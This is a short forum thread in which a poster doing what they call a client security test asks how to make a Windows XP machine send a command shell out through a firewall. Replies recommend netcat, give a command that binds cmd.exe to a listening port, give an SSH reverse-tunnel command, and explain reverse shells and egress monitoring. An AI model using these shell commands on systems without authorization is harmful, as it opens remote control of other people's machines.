Results 1 to 5 of 5

Thread: Reverse Command Prompt Suggestions

  1. #1
    Join Date
    Sep 2003

    Reverse Command Prompt Suggestions

    I didn't know exactly which forum to post this question. I thought this would be the most logical.

    I am conducting a test of technical security controls for a client and I'm looking for the easiest way to do this. I mainly want to test their IDS and AV capabilities. This is not a comprehense test of their systems, just a part as you can see.

    I would like your suggestions on programs that can spawn a remote command prompt outbound through a firewall via a specific port from a WinXP box. The delivery method is a non-problem. I will ensure the files gets on the system. Mainly I just need to have the shell get sent out of the firewall so i can connect to it.

    Any thoughts would be appreciated. Simplicity is key here. As mentioned before this is not a comprehensive test, just a one off.


  2. #2
    AO Senior Cow-beller
    zencoder's Avatar
    Join Date
    Dec 2004
    Mountain standard tribe.

    netcat is your friend

    netcat is one way.


    that's after a really quick search and scan. i think it'll tell you how. too lazy to look harder, but your google terms should include: netcat shovel shell

    caveat h4x0r - use of netcat may, can, and WILL likely get you fired if you don't have explicit permission and authorization.
    "Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
    Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
    "...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore

  3. #3
    Right turn Clyde Nokia's Avatar
    Join Date
    Aug 2003
    Button Moon
    Netcat is prolly the ideal way as has been suggested;

    nc -l -p 23 -t -e cmd.exe

    nc = netcat
    -l = listen to
    -p = port (to be listend to)
    23 = port number to be listened to, telnet in this case)
    -t = tells it to listen to telnet connections
    -e = execute
    cmd.exe = [execute] command prompt

    So in a nut shell, nc will listen on port 23 for a connection, when you connect it will execute the command prompt.

    Bear in mind though that if you are doing this on a enterprise network nc will sit in front of whatever should be running on that port. So say if you ran it on port 139,445 etc it would be sitting in front of legitemate NetBIOS/File sharing applications.
    Drugs have taught an entire generation of kids the metric system.


  4. #4
    Senior Member br_fusion's Avatar
    Join Date
    Apr 2002
    This is pertaining to linux, but if this WinXp machine had cygwin or similar, you could try using ssh.

    Create a ssh tunnel from behind the firewall to the outside system.
    "ssh -v -R 2222:localhost:22 outsideIP"

    Then from the outside computer, connect to the localhost.
    "ssh -p 2222 localhost"

    This might not help you, but good to keep your options open in case.
    The command completed successfully.

    \"They drew first blood not me.\"

  5. #5
    Just Another Geek
    Join Date
    Jul 2002
    Rotterdam, Netherlands
    A reverse command prompt means the victim's machine connects back to the attacker.. Not the attacker connecting to the victim..

    So I would have a netcat listening on a certain port, fire my exploit at the target, the target connects back to my netcat giving me a command prompt.. You can use this when the target doesn't allow incoming connections but does allow outgoing connections.. This is the reason you should monitor/firewall egress network traffic..
    Oliver's Law:
    Experience is something you don't get until just after you need it.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts